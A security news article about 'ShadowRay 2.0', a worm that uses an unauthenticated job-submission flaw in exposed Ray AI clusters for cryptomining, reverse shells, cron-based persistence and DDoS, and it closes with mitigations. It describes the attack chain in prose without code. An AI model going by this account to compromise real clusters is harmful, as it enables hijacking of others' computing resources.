Cybersecurity firm Oligo Security has issued a stark warning about ongoing cyberattacks that are turning vulnerable Ray AI clusters into a self-spreading cryptocurrency mining botnet. This malicious operation, dubbed “ShadowRay 2.0,” represents an escalation of an earlier wave of attacks seen between late 2023 and early 2024. The fundamental weakness being exploited is an unauthenticated access vulnerability (specifically CVE-2023-48022, scoring a critical 9.8 out of 10) in the Ray open-source framework, allowing attackers to seize control of compromised systems and steal their processing power, particularly from those equipped with powerful NVIDIA GPUs, for illicit mining of cryptocurrency using the XMRig software.

The Core of the Problem: A Design Flaw and Exposed Systems

The persistent nature of this vulnerability stems from a fundamental design choice within Ray. The developers intended the framework to operate exclusively within a secure, isolated network and to only process code from trusted sources. Because of this, the framework was not built with strong internal authentication mechanisms. Unfortunately, many users have ignored this best practice, leaving their Ray servers directly exposed to the public internet. This accidental exposure has created a massive and easily exploitable target pool for cybercriminals, with over 230,500 Ray servers currently accessible online. This massive surface area is a goldmine for attackers, as it offers a vast array of high-powered computing resources.

How the ShadowRay 2.0 Worm Spreads

The ShadowRay 2.0 campaign operates as a computer worm, designed to automatically spread from one victim to the next. The attack begins by submitting a malicious job to the exposed Ray Job Submission API (located at the /api/jobs/ endpoint on the dashboard). These jobs contain complex, multi-stage scripts written in Bash and Python that initially perform system checks. Once a cluster is compromised, the attackers leverage Ray’s own orchestration capabilities—the features designed to manage distributed tasks—to launch a spray and pray attack. This means the compromised clusters are weaponized to seek out and infect other unsecured Ray dashboards, creating a self-replicating infection chain that expands the botnet autonomously across the globe.

The attackers have utilized services like GitLab and GitHub to host and deliver their malicious payloads, using seemingly innocuous repository names like “ironern440-group” and “thisisforwork440-ops” to hide in plain sight. Although these accounts have been shut down, the attackers have shown remarkable persistence and a quick ability to adapt, immediately creating new accounts to resume their operation. This speed highlights the dedication of the threat actors behind this sophisticated campaign.

Covert Tactics and Global Reach

Once a system is infected, the malware utilizes the platform’s features to move laterally within the network, even reaching non-internet-facing nodes. It also creates reverse shells, essentially a secret communication link back to the attacker’s command-and-control infrastructure, allowing for remote takeover. To ensure the infection is permanent, a cron job is set up to automatically re-download the latest version of the malware from GitLab every 15 minutes, guaranteeing persistence on the host machine.

Researchers believe that the sophisticated structure, comments, and error-handling code within the GitLab payloads suggest the criminals may have used large language models (LLMs) to help craft the malicious scripts. The malware is also designed to be highly stealthy. It attempts to remain undetected by limiting its CPU usage to about 60% and disguising its processes to look like legitimate Linux kernel worker services. Furthermore, the malware contains a function to check if the infected machine is located in China and will deploy a version of the malware specific to that region. In a bid to maximize their profits, the botnet also scans for and terminates any competing cryptocurrency mining software running on the host, a common tactic in cryptojacking operations.

Evolving into a Multi-Purpose Botnet

The threat has expanded beyond simple cryptocurrency theft. Oligo Security observed that the attackers deployed Sockstress, a tool used to overwhelm and exhaust a server’s communication state, against production websites. This indicates that the compromised Ray clusters are now being utilized for denial-of-service (DDoS) attacks, turning the operation into a multi-purpose botnet. The target port for these attacks, 3333, is commonly associated with mining pools, suggesting that the criminals are using their new DDoS capabilities against rival mining infrastructure to eliminate competition. The ability to rent out or use DDoS capacity creates a second major revenue stream for the attackers beyond pure cryptojacking.

Mitigation and Defense Strategies

Anyscale, the original developer of the Ray framework, has responded by releasing a “Ray Open Ports Checker” tool. This tool allows users to verify that their clusters are correctly configured and not accidentally exposed online. For users, the primary defense strategies are to immediately configure firewall rules to block all unauthorized external access and to implement additional authorization on the default Ray Dashboard port (which is 8265). The critical takeaway is that while Ray is an immensely powerful tool for AI and distributed computing, users must strictly adhere to the security best practices and ensure the framework is never directly accessible from the public internet.